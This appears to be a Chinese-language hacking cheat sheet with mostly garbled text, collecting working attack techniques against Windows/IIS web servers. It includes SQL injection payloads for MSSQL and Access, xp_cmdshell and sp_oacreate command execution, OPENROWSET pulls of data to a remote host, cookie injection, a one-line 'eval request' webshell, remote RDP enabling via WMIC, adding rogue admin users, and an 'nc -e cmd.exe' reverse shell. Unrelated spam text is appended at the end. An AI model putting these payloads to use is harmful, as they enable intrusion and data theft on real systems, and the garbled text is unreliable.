վķ
SAݿ뼼SAݿ㷨+:
ע㲻Դ,ִҳ涼
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
Ŀ¼жϵͳΪ2000webݿ
Ҫ취õݿIPһˡ
עִ
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
ҳ淵ִͨtelnetһ⼦1433˿ڣȻnetstat/anûеõIP
NC˿ڶûеõIP
ͨעִҳ涼쳣⼦ͬҲûеõIP
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
ھͲDzݿҲ
accesstxtı
SELECT * into in 'd:\web\' 'text;' from admin
Զתָվͷ
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
java or jspվʱĬļ·:
\web-inf\web.xml
tomcatµļλ:
\conf\server.xml (ǰtomcat·)
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
ע·,ڹand or cookiesʱñЧ:
-1%23
>
<
1'+or+'1'='1
id=8%bf
ȫעԷ:
URLַ-1URLɣhttp://gzkb.goomoo.cn/news.asp?id=123-1صҳǰ治ͬһţʾע©͵ע©; URLַ -0URL http://gzkb.goomoo.cn/news.asp?id=123-0صҳǰҳͬ-1شҳ棬Ҳʾע©͵ġ
URLĵַ'%2B'URLַΪhttp://gzkb.goomoo.cn/news.asp?id=123'%2B'صҳ1ͬ;'2%2B'asdfURLַΪhttp://gzkb.goomoo.cn/news.asp?id=123'%2Basdfصҳ1ͬ˵δָ¼ߴʾע㣬ı͵ġ
עжϷ:
%' and '1'='1' and '%'='
%' and '1'='2' and '%'='
COOKIESע:
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
2000רҵ鿴ص¼û:
net config workstation
2003²鿴ipsecúĬϷǽ:
netsh firewall show config
netsh ipsec static show all
ָָ:
netsh ipsec static set policy name=test assign=n(testDzָɵIJ)
netsh ipsec static show policy allʾ
¹Ա̨С:
admin/left.asp
admin/main.asp
admin/top.asp
admin/admin.asp
ֳ˵,ȻѸȫ
Ṥѧ:
Ϣ http://tool.chinaz.com/ Whoisע˺ά
Ȼȥƭͷ
ͳϵͳʹõITѧϰߵͳϵͳһоϵͳwebshellһͶ֣1.ݿһ仰ľͻӵõ2.վҳдľwebshellݿĿ¼ݿչaspģĬ·:data/#ITlearner.asp,ݿչij*.mdbСӵݿߴзصıԱĬǣITlearnerݿһ仰ľ·߲ͨˣֻпڶַвĬ http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,鿴ԭ룺
maxlength="3"Ϊmaxlength="100">Ϊͻƹ̶ȵַ롣Ȼ Ϊaction="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">
ΪhtmlļϸϢ¼¼ĬΪ100100:eval request(chr(35))档ʾҵ֡
6. 554˿ real554.exe֡ 6129˿ dameware6129.exe֡ ϵͳ© 135445˿ڣms03026ms03039ms03049ms04011© ֡ 3127ȶ˿ doomĶ˿ڣnodoom.exe֡mydoomscan.exe飩
CMDעλ
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
AutoRun
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
AutoRun
עʱHidden,ijtest
mstsc /v:IP /console
һ仰3389:
Ͽ³һַ,һ仰3389,˵ֻ2003ϵͳ,,дʹҷһ°.ܼ,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
Զ̣WMIC /node:"Զ̻" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='Զ̻' call SetAllowTSConnections 1 ,ʵһЩ20033389,Ҳ,пһ֪.
ֶ֪ΣʹSQLACCESSݿмӸû:
Insert into admin(user,pwd) values('test','test')
NC
ڱִУnc -vv -lp Ķ˿ (Լִ)
ȻڷִУ nc -e cmd.exe ԼIP ͼĶ˿ (Էִ)
ڽűֹҪ%00ȷ²Ƿ
ʱֵʱwebshellûа취оվĿ¼dirҲеʱʱԳDOSSUBSTתĿ¼
:
subst k: d:\www\ dwwwĿ¼k
subst k: /dK̴ We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
ҳ:
[1]